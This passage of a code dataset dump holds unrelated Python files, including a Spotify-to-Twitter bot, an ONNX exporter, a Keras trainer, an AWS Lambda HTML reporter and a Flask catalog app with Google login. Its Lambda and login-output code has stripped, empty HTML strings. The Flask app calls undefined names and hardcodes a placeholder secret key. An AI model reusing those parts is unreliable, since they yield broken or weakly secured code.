songArtist = currentSongInformation['item']['artists'][0]['name']\n songLink = currentSongInformation['item']['external_urls']['spotify']\n return songName, albumName, songArtist, songLink\n \ndef deleteLatestTweet():\n latestTweet = api.user_timeline(count = 1)[0]\n message = f\"You're about to delete {latestTweet.text}. Would you like to continue? yes or no\\n\"\n if (input(message) == \"yes\"):\n return \"Successfully deleted the latest tweet: \" + \\\n api.destroy_status(latestTweet.id).text\n else:\n return \"No message has been deleted.\"\n \ndef tweetSpotifyStatus():\n # using pytz to use the Eastern timezone, necessary bc Heroku's local timezones differ\n eastern = timezone('US/Eastern')\n # returns the data for Eastern time currently\n currentEasternTime = datetime.now().astimezone(eastern)\n # returns hour in 12-hour format (%I) and the AM/PM (%p)\n hour = currentEasternTime.strftime(\"%I%p\").lstrip('0').lower()\n # returns weekday (%A) + month as # (%m) + day of month as # (%d)\n day = currentEasternTime.strftime(\"%A %m/%d\")\n \n if isPlaying() == True:\n try:\n song, album, artist, link = spotifySongInfo()\n if (album): # see if it has an album, if so, tweet the album as well\n print(f\"Posting the current status as of {hour} {day}: {song} of album {album} by {artist} on {hour} {day}.\\nSpotify Link: {link}\")\n api.update_status(f\"{username} is currently listening to {song} of the album {album} by {artist} as of {hour} {day}.{link}\")\n return\n api.update_status(f\"{username} is currently listening to {song} by {artist} as of {hour} {day}.{link}\")\n print(f\"Posting the current status as of {hour} {day}: {song} by {artist} on {hour} {day}.\\nSpotify Link: {link}\")\n except tweepy.TweepError as e:\n print(e)\n else:\n try:\n print(f\"Posting the current status as of {hour} {day}: False\")\n api.update_status(f\"{username} is NOT currently listening to Spotify as of {hour} {day}.\")\n except tweepy.TweepError as e:\n print(e) \n \n#schedule.every().hour.do(tweetSpotifyStatus)\n\nif __name__ == \"__main__\":\n sp = spotipy.Spotify(auth=spotifyToken())\n api = tweepy.API(twitterAuthentication())\n username = api.me().name\n print(\"Authenticated as \" + username)\n print(\"Tweeting the status of your Spotify account every hour.\")\n tweetSpotifyStatus()\n\n #while True:\n # schedule.run_pending()\n # sleep(1)","sub_path":"tweetSpotifySong.py","file_name":"tweetSpotifySong.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"607623410","text":"import io\nimport os\nimport numpy as np\nimport torch\nimport onnx\nimport onnxruntime\nfrom onnx import optimizer\nimport net.erfnet as net\nfrom options.options import parser\nfrom options.config import cfg\n\ndef load_model():\n global args\n args = parser.parse_args()\n\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = ','.join(str(gpu) for gpu in args.gpus)\n args.gpus = len(args.gpus)\n\n num_ego = cfg.NUM_EGO\n num_class = cfg.NUM_CLASSES\n model = net.ERFNet(num_class, num_ego).cuda()\n # model = torch.nn.DataParallel(model, device_ids=range(args.gpus)).cuda()\n\n if args.resume:\n if os.path.isfile(args.resume):\n print((\"=> loaded checkpoint '{}'\".format(args.resume)))\n checkpoint = torch.load(args.resume, map_location=lambda storage, loc: storage)\n print((\"=> loaded checkpoint '{}' (epoch {})\".format(args.resume, checkpoint['epoch'])))\n else:\n print((\"=> no checkpoint found at '{}'\".format(args.resume)))\n\n state_dict_ = checkpoint['state_dict']\n state_dict = {}\n\n # convert data_parallal to model\n for k in state_dict_:\n if k.startswith('module') and not k.startswith('module_list'):\n state_dict[k[7:]] = state_dict_[k]\n else:\n state_dict[k] = state_dict_[k]\n model_state_dict = model.state_dict()\n\n # check loaded parameters and created model parameters\n msg = 'If you see this, your model does not fully load the ' + \\\n 'pre-trained weight. Please make sure ' + \\\n 'you have correctly specified --arch xxx ' + \\\n 'or set the correct --num_classes for your own dataset.'\n for k in state_dict:\n if k in model_state_dict:\n if state_dict[k].shape != model_state_dict[k].shape:\n print('Skip loading parameter {}, required shape{}, '\n 'loaded shape{}. {}'.format(k, model_state_dict[k].shape,\n state_dict[k].shape, msg))\n state_dict[k] = model_state_dict[k]\n else:\n print('Drop parameter {}.'.format(k) + msg)\n for k in model_state_dict:\n if not (k in state_dict):\n print('No param {}.'.format(k) + msg)\n state_dict[k] = model_state_dict[k]\n model.load_state_dict(state_dict, strict=False)\n\n return model\n\ndef create_onnx_model(args):\n net = load_model()\n net.eval()\n\n onnx_file = args.onnx_file\n print(\"==> Exporting model to ONNX format at '{}'\".format(onnx_file))\n input_names = [\"input\"]\n if cfg.NUM_CLASSES and cfg.NUM_EGO:\n output_names = [\"output/cls\", \"output/ego\", \"output/exist\"]\n elif cfg.NUM_CLASSES and cfg.NUM_EGO == 0:\n output_names = [\"output/cls\"]\n elif cfg.NUM_CLASSES == 0 and cfg.NUM_EGO:\n output_names = [\"output/ego\", \"output/exist\"]\n torch_in = torch.randn(1, 3, cfg.MODEL_INPUT_HEIGHT, cfg.MODEL_INPUT_WIDTH, device='cuda')\n\n # from thop import profile\n # flops, params = profile(net, inputs=(torch_in,))\n # from thop import clever_format\n # macs, params = clever_format([flops, params], \"%.3f\")\n # print(macs, params, flops)\n\n with torch.no_grad():\n with io.BytesIO() as f:\n torch_out = net(torch_in)\n torch.onnx.export(net,\n torch_in,\n f,\n export_params=True,\n verbose=False,\n input_names=input_names,\n output_names=output_names)\n onnx_model = onnx.load_from_string(f.getvalue())\n\n all_passes = optimizer.get_available_passes()\n passes = args.onnx_optim_passes.split(',')\n assert all(p in all_passes for p in passes)\n onnx_model = optimizer.optimize(onnx_model, passes)\n\n onnx.save(onnx_model, onnx_file)\n\n # import netron\n # netron.start(onnx_file)\n\n return torch_in, torch_out\n\n\ndef validate_model(args, model_in, model_out):\n ort_session = onnxruntime.InferenceSession(args.onnx_file)\n\n def to_numpy(tensor):\n if isinstance(tensor, list):\n tensor = tensor[0]\n return tensor.detach().cpu().numpy(\n ) if tensor.requires_grad else tensor.cpu().numpy()\n\n # compute ONNX Runtime output prediction\n ort_inputs = {ort_session.get_inputs()[0].name: to_numpy(model_in)}\n ort_outs = ort_session.run(None, ort_inputs)\n\n # compare ONNX Runtime and PyTorch results\n\n for i in range(len(ort_outs)):\n print(ort_outs[i].shape)\n np.testing.assert_allclose(to_numpy(model_out),\n ort_outs[i],\n rtol=1e-03,\n atol=1e-05)\n\n print(\"Exported model has been tested with ONNXRuntime, \"\n \"and the result looks good!\")\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n inputs, outputs = create_onnx_model(args)\n print(\"Validating model... \")\n validate_model(args, inputs, outputs)\n print(\"All Done\")\n","sub_path":"src/convert_to_onnx.py","file_name":"convert_to_onnx.py","file_ext":"py","file_size_in_byte":5041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"527521270","text":"#!/usr/bin/env python3\n\nfrom utils import Options\nfrom simulator import Simulator\nfrom transitionTable import TransitionTable\n\nimport numpy as np\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Conv1D, MaxPooling1D, Flatten, Dense, Dropout, Reshape\n\n#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n# NOTE:\n# this script assumes you did generate your data with the get_data.py script\n# you are of course allowed to change it and generate data here but if you\n# want this to work out of the box first run get_data.py\n#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\n# 0. initialization\nopt = Options()\nsim = Simulator(opt.map_ind, opt.cub_siz, opt.pob_siz, opt.act_num)\ntrans = TransitionTable(opt.state_siz, opt.act_num, opt.hist_len,\n opt.minibatch_size, opt.valid_size,\n opt.states_fil, opt.labels_fil)\n\ntrain_data = trans.get_train()\nvalid_data = trans.get_valid()\n\n# 1. train\n\nmodel = Sequential()\n\n# use data like provided as series\nmodel.add(Reshape((opt.state_siz * opt.hist_len, 1),\n input_shape=(opt.state_siz * opt.hist_len,)))\nmodel.add(Conv1D(8, kernel_size=64, strides=1, activation='relu'))\nmodel.add(MaxPooling1D(pool_size=2))\nmodel.add(Conv1D(16, kernel_size=32, strides=1, activation='relu'))\nmodel.add(MaxPooling1D(pool_size=2))\nmodel.add(Conv1D(32, kernel_size=16, strides=1, activation='relu'))\nmodel.add(MaxPooling1D(pool_size=2))\nmodel.add(Conv1D(32, kernel_size=8, strides=1, activation='relu'))\nmodel.add(MaxPooling1D(pool_size=2))\nmodel.add(Conv1D(32, kernel_size=4, strides=1, activation='relu'))\nmodel.add(MaxPooling1D(pool_size=2))\nmodel.add(Flatten())\nmodel.add(Dense(opt.act_num, activation='softmax'))\n\nmodel.summary()\n\nmodel.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.Adam(lr=0.001),\n metrics=['accuracy'])\n\ncallbacks = []\nif opt.log_tensorboard:\n tensorboard_cb = keras.callbacks.TensorBoard(log_dir=opt.tensorboard_log_dir, histogram_freq=1,\n write_graph=True, write_images=True, write_grads=True)\n callbacks.append(tensorboard_cb)\n\nmodel.fit(*train_data,\n batch_size=opt.minibatch_size,\n epochs=5,\n verbose=1,\n callbacks=callbacks,\n validation_data=valid_data)\n\n# 2. save your trained model\nmodel.save(opt.model_fil)\n","sub_path":"exercise3robotics/train_agent.py","file_name":"train_agent.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"628311862","text":"# coding=utf-8\nimport os.path\nfrom setuptools import setup, find_packages\n\n\ndef read_relative_file(filename):\n \"\"\"Returns contents of the given file.\n Filename argument must be relative to this module.\n \"\"\"\n with open(os.path.join(os.path.dirname(__file__), filename)) as f:\n return f.read()\n\n\nsetup(\n name='drupal.drush.generator',\n version='0.1dev',\n url='https://github.com/benoitbryon/drupal-drush-generator',\n author='Benoit Bryon',\n author_email='benoit@marmelune.net',\n license='BSD',\n description='Helpers to install drush and generate a \"project-specific\" ' \\\n 'drush script. Includes a buildout recipe.',\n long_description=read_relative_file('README.txt'),\n platforms='Any',\n classifiers = [\n 'Development Status :: 3 - Alpha',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n ],\n packages=find_packages(),\n namespace_packages=['drupal', 'drupal.drush'],\n include_package_data=True,\n data_files = [('drupal/drush/generator/templates/', ['drupal/drush/generator/templates/drush_wrapper.sh'])],\n install_requires=[\n 'setuptools',\n ],\n entry_points={\n 'zc.buildout': [\n 'drush_generator = drupal.drush.generator.buildout:DrushGeneratorRecipe',\n ],\n },\n scripts=[\n 'bin/drush_generator.py',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"218158916","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport wave\r\nimport struct\r\nfrom math import pi\r\nimport soundfile\r\n\r\nnum_samples = 4800\r\namplitude = 800\r\nsampling_rate = 4800.0\r\nFreq=[100,150,400,500,700,1000,1200,1500]\r\nfile = \"test3.wav\"\r\n\r\nt= np.arange(0,1,1/sampling_rate)\r\n\r\nsine_wave = 0\r\n\r\n#sine_wave = np.sin(2*pi*100*t)\r\n\r\nfor i in Freq:\r\n sine_wave += np.sin(2*pi*i*t)\r\n\r\nnframes=num_samples\r\ncomptype=\"NONE\"\r\ncompname=\"not compressed\"\r\nnchannels=1\r\nsampwidth=2\r\nwav_file=wave.open(file, 'w')\r\n\r\nwav_file.setparams((nchannels, sampwidth, int(sampling_rate), nframes, comptype, compname))\r\nfor s in sine_wave:\r\n wav_file.writeframes(struct.pack('h', int(s*amplitude)))\r\n","sub_path":"equallizer/wwave.py","file_name":"wwave.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"219411767","text":"from json import loads\nimport platform\nimport logging\nfrom urllib.request import urlopen\n\n''' Python 3 Lambda function that returns the following in raw HTML/CSS:\n\n - Location data based on the IP address of the function execution environment\n\n - Data passed from the browser client via API Gateway\n\n - Various attributes of the function execution context\n\n For info on provisioning API gateway, please see README.md @\n https://github.com/mikeoc61/aws-lambda-get-event-detail\n'''\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nplatform_data = {\n 'system': platform.system(),\n 'platform': platform.platform(),\n 'nodename': platform.node(),\n 'machine': platform.machine(),\n 'architecture': platform.architecture(),\n 'processor': platform.processor(),\n 'python': platform.python_version()\n }\n\ndef get_IP_geo():\n '''Get location related data from seb service: http://ipinfo.io/json'''\n\n geo_URL = \"http://ipinfo.io/json\"\n\n # Initialize data structure we will use to build and return to caller so\n # that function will still return data in and expected format if call fails\n\n geo_json = {\n \"ip\": \"123.123.123.123\",\n \"city\": \"AnyTown\",\n \"region\": \"AnyState\",\n \"country\": \"AnyCountry\",\n \"loc\": [\"99.9999\", \"-99.9999\"],\n \"postal\": \"90210\",\n \"org\": \"MickeyMouse Technologies Inc.\"\n }\n\n # Open the URL and read the data, if successful decode bytestring and\n # split lat and long into separate strings for easier handling\n\n try:\n webUrl = urlopen (geo_URL)\n except:\n logger.error(\"Error opening: %s, using default location\", geo_URL)\n else:\n if (webUrl.getcode() == 200):\n geo_data = webUrl.read()\n geo_json = loads(geo_data.decode('utf-8'))\n geo_json['loc'] = geo_json['loc'].split(',')\n else:\n logger.error(\"webUrl.getcode() returned: %s\", webUrl.getcode())\n logger.error(\"Using default location data\")\n\n return geo_json\n\ndef build_response(event, context):\n '''Using event and context data structures provided by the event\n handler, build a DOM formatted as CSS/HTML/Javascript consisting\n of information about the execution environment and return DOM\n to the lambda event handler.\n '''\n\n # Format the Head section of the DOM including any CSS formatting to\n # apply to the remainder of the document. Break into multiple lines for\n # improved readability\n\n html_head = \"\"\n html_head += \"\"\n html_head += \"Display Lambda Function Detail\"\n html_head += \"\"\n html_head += \"\"\n\n # This is the main part of the routine and forms the HTML Body section and\n # needs to be constructed of pure HTML as we will be returning only HTML to\n # a browser client\n\n html_body = \"\"\n html_body += \"

        AWS Lambda Function Event Details

        \"\n\n html_body += \"
        \"\n html_body += \"
        \"\n\n html_body += \"
        \"\n\n # Location detail based on IP address of calling function\n\n my_geo = get_IP_geo()\n html_body += \"

        Location Detail based on IP lookup

        \"\n html_body += \"
        \"\n html_body += \"
          \"\n for k, v in my_geo.items():\n html_body += \"
        • {} = {}
        • \".format(k, v)\n html_body += \"
        \"\n html_body += \"
        \"\n\n # Platform Execution Environment details\n\n html_body += \"

        Platform Execution Detail

        \"\n html_body += \"
        \"\n html_body += \"
          \"\n for k, v in platform_data.items():\n html_body += \"
        • {} = {}
        • \".format(k, v)\n html_body += \"
        \"\n html_body += \"
        \"\n\n # Event detail based on format defined by API gateway Integration Request\n # mapping template for method invoked. Loop through data structures in\n # the event{} object and convert to HTML list items.\n\n html_body += \"

        Client Request Detail

        \"\n\n html_body += \"
        \"\n html_body += \"
          \"\n for key, v in event.items():\n html_body += \"

          {}

          \".format(key)\n logger.info(\"Key %s = %s\", key, event[key])\n if isinstance(event[key], dict):\n for attr, val in v.items():\n html_body += \"
        • {} = {}
        • \".format(attr, v[attr])\n elif isinstance(event[key], str):\n html_body += \"
        • {} = {}
        • \".format(key, event[key])\n html_body += \"
        \"\n html_body += \"
        \"\n\n # Display some context attributes for this lambda function. See:\n # https://docs.aws.amazon.com/lambda/latest/dg/python-context-object.html\n\n html_body += \"

        Event Context Detail

        \"\n html_body += \"
        \"\n html_body += \"
          \"\n html_body += \"
        • Function name: {}
        • \".format(context.function_name)\n html_body += \"
        • Function version: {}
        • \".format(context.function_version)\n html_body += \"
        • Function ARN: {}
        • \".format(context.invoked_function_arn)\n html_body += \"
        • Request ID: {}
        • \".format(context.aws_request_id)\n html_body += \"
          \"\n html_body += \"
        • Time used (MS): {}
        • \".format(\n 3000 - context.get_remaining_time_in_millis())\n html_body += \"
        • Time budget remaining (MS): {}
        • \".format(\n context.get_remaining_time_in_millis())\n html_body += \"
        • Memory limits (MB): {}
        • \".format(\n context.memory_limit_in_mb)\n html_body += \"
        \"\n html_body += \"
        \"\n\n # Finished with HTML formatting\n\n html_body += \"
        \"\n html_body += \"\"\n html_tail = \"\"\n\n # Assemble HTML response and return via API Gateway\n\n resp = html_head + html_body + html_tail\n\n return resp\n\ndef lambda_handler(event, context):\n '''Main event handler function invoked by API gateway. In this case,\n function simply calls the response_builder function and\n will returns CSS/HTML via the gataway to the client\n '''\n\n logger.info('Event: %s', event)\n logger.info('Context: %s', context)\n\n return build_response(event, context)\n","sub_path":"get_event_detail.py","file_name":"get_event_detail.py","file_ext":"py","file_size_in_byte":7702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"598945420","text":"from flask import (Flask, jsonify, render_template, url_for, request,\n redirect, session as login_session, make_response, flash)\nfrom sqlalchemy import create_engine, exc\nfrom sqlalchemy.orm import sessionmaker\nfrom models import Base, Category, Item, User\nimport os\n\n# for login\nimport random\nimport string\nimport json\n\n# imports for google login\nfrom oauth2client.client import (OAuth2WebServerFlow, FlowExchangeError)\n\n# HTTP client library. get method returns None if object is not found\nimport httplib2\n# Apache 2.0 licensed HTTP library written in python\nimport requests\n\napp = Flask(__name__)\napp.secret_key = 'super_secret_key'\n\n\n# if in production(Heroku) then use their database url\n# else it is development, use the postgres engine\nif os.getenv('FLASK_ENV') == 'production':\n debug = False\n database_url = os.getenv('DATABASE_URL')\n engine = create_engine(database_url)\nelse:\n debug = True\n engine = create_engine('postgresql+psycopg2:///item_catalog')\n\n# bind the engine\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n\ndef logged_in():\n \"\"\"check to see if user is logged in\"\"\"\n return True if 'username' in login_session else False\n\n\n@app.route(\"/\")\n@app.route(\"/catalog/\")\ndef catalog():\n \"\"\"lists all the categories\"\"\"\n categories = session.query(Category).all()\n return render_template('catalog.html', categories=categories,\n logged_in=logged_in())\n\n\n@app.route(\"/catalog//items/\")\ndef category_items(category_id):\n \"\"\"show the category and its items\"\"\"\n category = session.query(Category).filter_by(id=category_id).first()\n\n # if the category does not exist, flash an error message\n if category is None:\n flash(\"There is no such category as %s!\" % category_name)\n return redirect(url_for('catalog'))\n items = session.query(Item).filter_by(cat_id=category.id)\n return render_template('items.html', category=category, items=items,\n logged_in=logged_in())\n\n\n@app.route(\"/catalog///\")\ndef item(category_id, item_id):\n \"\"\"specific item in the category\"\"\"\n category = session.query(Category).filter_by(id=category_id).first()\n item = session.query(Item).filter_by(id=item_id).first()\n owner = getUserInfo(item.user_id)\n # check to see if the edit and delete link should be shown to this user\n show_update_links = False\n if logged_in():\n user_id = getUserID(login_session['email'])\n if item.user_id == user_id:\n show_update_links = True\n\n # if theres no category or item, then flash error message\n if category is None:\n flash(\"Category '%s' does not exist!\" % category_id)\n return redirect(url_for('catalog'))\n elif item is None:\n flask(\"Item '%s' does not exist!\" % item_id)\n return redirect(url_for('catalog'))\n elif item.category != category:\n flask(\"%s does not have an item '%s'\" % (category_id, item_id))\n return redirect(url_for('catalog'))\n return render_template('item.html', category=category, item=item,\n owner=owner, show_update_links=show_update_links,\n logged_in=logged_in())\n\n\n@app.route(\"/catalog.json\")\ndef catalog_json():\n \"\"\"json output of all the categories along with its items\"\"\"\n categories = session.query(Category).all()\n serialized_categories = []\n for category in categories:\n\n # get all the items in the category\n items = session.query(Item).filter_by(category=category).all()\n serialized_items = [item.serialize for item in items]\n\n # serialize the current category and add its serialized items to it\n current_category = category.serialize\n current_category.update({\"items\": serialized_items})\n serialized_categories.append(current_category)\n\n # output the categories and its items\n serialized_categories = {\"categories\": serialized_categories}\n response = make_response(jsonify(serialized_categories))\n response.headers['Content-type'] = 'application/json'\n return response\n\n\n@app.route(\"/categories.json\")\ndef categories_json():\n \"\"\"json output of all the categories without its items\"\"\"\n categories = session.query(Category).all()\n serialized_categories = [category.serialize for category in categories]\n response = make_response(jsonify(serialized_categories))\n response.headers['Content-type'] = 'application/json'\n return response\n\n\n@app.route(\"/catalog//json/\")\ndef category_items_json(category_id):\n \"\"\"json output of the category\"\"\"\n category = session.query(Category).filter_by(id=category_id).first()\n response = make_response(jsonify(category.serialize))\n response.headers['Content-type'] = 'application/json'\n return response\n\n\n@app.route(\"/catalog///json/\")\ndef item_json(category_id, item_id):\n \"\"\"json output of specific item in the category\"\"\"\n item = session.query(Item).filter_by(id=item_id).one_or_none()\n response = make_response(jsonify(item.serialize))\n response.headers['Content-type'] = 'application/json'\n return response\n\n\n@app.route(\"/catalog//edit/\", methods=[\"GET\", \"POST\"])\ndef edit(item_id):\n \"\"\"Edits the selected item\"\"\"\n if logged_in():\n item = session.query(Item).filter_by(id=item_id).first()\n user_id = getUserID(login_session['email'])\n\n # check if the item exists\n if item is not None:\n # if the logged in person is not the owner of the item,\n # do not let them delete the item\n if item.user_id != user_id:\n flash('Unauthorized Access')\n return redirect(url_for('catalog'))\n # if it is a post method, delete it from the database\n if request.method == \"POST\":\n title = request.form.get('title').strip()\n description = request.form.get('description')\n cat_id = request.form.get('cat_id')\n\n # only update if they changed one of the fields. avoids db hits\n if item and (item.description != description or\n str(item.cat_id) != cat_id or\n item.title != title):\n\n # only update the title if they\n # provided a title that is not empty\n if title:\n item.title = title\n item.description = description\n item.cat_id = cat_id\n session.add(item)\n session.commit()\n flash(\"You have updated %s\" % item.title)\n return redirect(url_for('item', category_id=item.cat_id,\n item_id=item_id))\n else:\n # if there was no change, flash error message\n flash(\"You didnt change anything!\")\n return redirect(url_for('edit', item_id=item_id))\n\n # if get method, render the edit.html page\n categories = session.query(Category).all()\n return render_template('edit.html', item=item,\n categories=categories,\n logged_in=logged_in())\n # if the item does not exist, let the user know\n else:\n flash(\"Item %s does not exist\" % item_id)\n return redirect(url_for('catalog'))\n else:\n flash('Unauthorized Access')\n return redirect(url_for('catalog'))\n\n\n@app.route(\"/catalog//delete/\", methods=[\"GET\", \"POST\"])\ndef delete(item_id):\n \"\"\"Deletes the selected item\"\"\"\n if logged_in():\n item = session.query(Item).filter_by(id=item_id).first()\n user_id = getUserID(login_session['email'])\n\n # check if the item exists\n if item is not None:\n # if the logged in person is not the owner of the item,\n # do not let them delete the item\n if item.user_id != user_id:\n flash('Unauthorized Access')\n return redirect(url_for('catalog'))\n # if it is a post method, delete it from the database\n if request.method == \"POST\":\n session.delete(item)\n session.commit()\n flash('Item was deleted')\n return redirect(url_for('catalog'))\n # if get method, show the button to confirm deletion\n return render_template('delete.html', item=item,\n logged_in=logged_in())\n # if the item does not exist, let the user know\n else:\n flash(\"Item %s does not exist\" % item_id)\n return redirect(url_for('catalog'))\n else:\n flash('Unauthorized Access')\n return redirect(url_for('catalog'))\n\n\n@app.route(\"/catalog/new/\", methods=[\"GET\", \"POST\"])\ndef new():\n \"\"\"Creates a new item\"\"\"\n\n if logged_in() and request.method == 'POST':\n # check to see if they entered a title\n if request.form.get('title'):\n # get the category and description and enter it into the database\n title = request.form.get('title')\n cat_id = request.form.get('category')\n description = request.form.get('description')\n user_id = getUserID(login_session['email'])\n item = Item(cat_id=cat_id, title=title, description=description,\n user_id=user_id)\n session.add(item)\n session.commit()\n # flash a message to let them know the item has been created\n flash(\"You have added a new item! category id: %s , title: %s,\"\n \"description: %s\" % (cat_id, title, description))\n return redirect(url_for('catalog'))\n else:\n # show the 'new' form\n categories = session.query(Category).all() if logged_in() else None\n return render_template('new.html', categories=categories,\n logged_in=logged_in())\n\n\n@app.route('/login/')\ndef showLogin():\n \"\"\"Generates a state and shows a login page\"\"\"\n\n # create a random string state to prevent cross site forgery\n state = ''.join(random.choice(string.ascii_uppercase + string.digits)\n for x in range(32))\n # save state in session\n login_session['state'] = state\n CLIENT_ID = json.loads(open('client_secrets.json',\n 'r').read())['web']['client_id'] \n return render_template('login.html', STATE=state, CLIENT_ID=CLIENT_ID)\n\n\ndef getUserID(email):\n \"\"\"Get a user's id based on email\"\"\"\n try:\n user = session.query(User).filter_by(email=email).one_or_none()\n return user.id\n except exc.SQLAlchemyError:\n return None\n\n\ndef getUserInfo(user_id):\n \"\"\"get a user based on their id\"\"\"\n try:\n user = session.query(User).filter_by(id=user_id).first()\n return user\n except exc.SQLAlchemyError:\n return None\n\n\ndef createUser(login_session):\n \"\"\"creates a new user using the info stored in the\n login_session and saves it in the database\"\"\"\n newUser = User(email=login_session['email'])\n session.add(newUser)\n session.commit()\n user = session.query(User).filter_by(email=login_session['email']).one_or_none()\n return user.id\n\n\n@app.route('/gconnect', methods=[\"POST\"])\ndef gconnect():\n \"\"\"Connect using google login\"\"\"\n state = request.args.get('state')\n # if the state is not the same, then reject connection\n if state != login_session['state']:\n response = make_response(json.dumps('Invalid state parameter.'), 401)\n response.headers['Content-type'] = 'application/json'\n return response\n\n # if the state tokens match, then get the google one time use code\n code = request.data\n try:\n # CLIENT_ID = os.environ.get('ITEM_CATALOG_GOOGLE_ID')\n # CLIENT_SECRET = os.environ.get('ITEM_CATALOG_GOOGLE_SECRET')\n CLIENT_ID = json.loads(open('client_secrets.json',\n 'r').read())['web']['client_id']\n CLIENT_SECRET = json.loads(open('client_secrets.json',\n 'r').read())['web']['client_secret']\n # upgrade the authorization code into a credentials object\n # oauth_flow = flow_from_clientsecrets('client_secrets.json',scope='')\n oauth_flow = OAuth2WebServerFlow(client_id=CLIENT_ID,\n client_secret=CLIENT_SECRET,\n scope='',\n redirect_uri='postmessage')\n credentials = oauth_flow.step2_exchange(code)\n # if unable to exchange authorization code for credentials, give error\n except FlowExchangeError:\n response = make_response(json.dumps('Failed to upgrade the '\n 'authorization code.'), 401)\n return response\n # if able to trade for credentials, check if access_token is valid\n access_token = credentials.access_token\n url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=%s'\n % access_token)\n h = httplib2.Http()\n # result contains our client id and the logged in user's info\n result = json.loads(h.request(url, 'GET')[1].decode())\n\n # if there is an error in the access token, then give error response\n if result.get('error') is not None:\n response = make_response(json.dumps(result.get('error')), 500)\n response.headers['Content-type'] = 'application/json'\n return response\n\n # if ther were no issues with the state or exchanging for access token,\n # check to see if the access token's id matches the google user id\n gplus_id = credentials.id_token['sub']\n if result['user_id'] != gplus_id:\n response = make_response(json.dumps(\"Token's user ID does not match \"\n \"given user ID\"), 401)\n response.headers['Content-type'] = 'application/json'\n return response\n\n # verify that the access token is valid for our app\n if result['issued_to'] != CLIENT_ID:\n response = make_response(json.dumps(\"Token's user ID doesn't match \"\n \"app's ID\"), 401)\n response.headers['Content-type'] = 'application/json'\n return response\n\n # check to see if user is already logged in\n stored_access_token = login_session.get('access_token')\n stored_gplus_id = login_session.get('gplus_id')\n # if these 2 are stored and matches, then the user is already logged in\n if stored_access_token is not None and gplus_id == stored_gplus_id:\n response = make_response(json.dumps('User is already connected'), 200)\n response.headers['Content-type'] = 'application/json'\n return response\n\n # if access token user matches logged in user and client id matches\n # client id, get the user info from google\n userinfo_url = \"https://www.googleapis.com/oauth2/v1/userinfo\"\n params = {'access_token': credentials.access_token, 'alt': 'json'}\n answer = requests.get(userinfo_url, params=params)\n data = answer.json()\n\n # store the users info in login_session\n login_session['provider'] = 'google'\n login_session['access_token'] = credentials.access_token\n login_session['gplus_id'] = gplus_id\n login_session['username'] = data.get('name','')\n login_session['picture'] = data['picture']\n login_session['email'] = data['email']\n\n # check to see if user is found in database and\n # then populate the login_session['user_id']\n user_id = getUserID(login_session['email'])\n if not user_id:\n user_id = createUser(login_session)\n user = getUserInfo(user_id)\n login_session['user_id'] = user.id\n\n output = ''\n output += '

        Welcome, '\n output += login_session['username']\n output += '!

        '\n output += ' ListNode:\n prehead = head = ListNode()\n p1, p2, carry = l1, l2, 0\n\n while p1 or p2 or carry:\n _sum = (p1.val if p1 else 0) + (p2.val if p2 else 0) + carry\n toAdd, carry = _sum % 10, _sum >= 10\n head.next = ListNode(toAdd)\n p1 = p1.next if p1 else None\n p2 = p2.next if p2 else None\n head = head.next\n return prehead.next\n","sub_path":"leetcode/list/2_add_two_numbers.py","file_name":"2_add_two_numbers.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"484971547","text":"from __future__ import unicode_literals\n\nfrom django.db import models\nimport uuid\n\n\nclass Foo(models.Model):\n id = models.UUIDField(\n primary_key=True,\n default=uuid.uuid4,\n editable=False,\n )\n\n name = models.CharField(\n max_length=255,\n default='Foobar',\n )\n","sub_path":"testit/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"631381840","text":"import arcpy\n\nfootprints_file = r'C:\\Users\\ksutton\\Documents\\Data\\LPC_IL_HD_Bld_DB_10_19_18.shp'\n\ndef select_bin_ids(\n input_bin, # this is the input BIN ID\n input_footprints, # this is the historic footprints file\n distance, # this is the buffer distance\n):\n sql_bin = '\"BIN\" = 1011258'.format(input_bin)\n\n if arcpy.Exists('build_lyr'):\n arcpy.Delete_management('build_lyr')\n if arcpy.Exists('select_bin_lyr'):\n arcpy.Delete_management('select_bin_lyr')\n if arcpy.Exists('in_memory/buffer'):\n arcpy.Delete_management('in_memory/buffer')\n\n arcpy.MakeFeatureLayer_management(\n input_footprints, # input feature class\n \"build_lyr\", # output layer\n sql_bin, # sql statement\n )\n\n arcpy.Buffer_analysis(\n \"build_lyr\",\n \"in_memory/buffer4\",\n distance,\n )\n\n arcpy.MakeFeatureLayer_management(\n input_footprints,\n 'select_bin_lyr'\n )\n arcpy.SelectLayerByLocation_management(\n 'select_bin_lyr',\n 'INTERSECT',\n 'in_memory/buffer4'\n )\n\n bin_list = []\n\n with 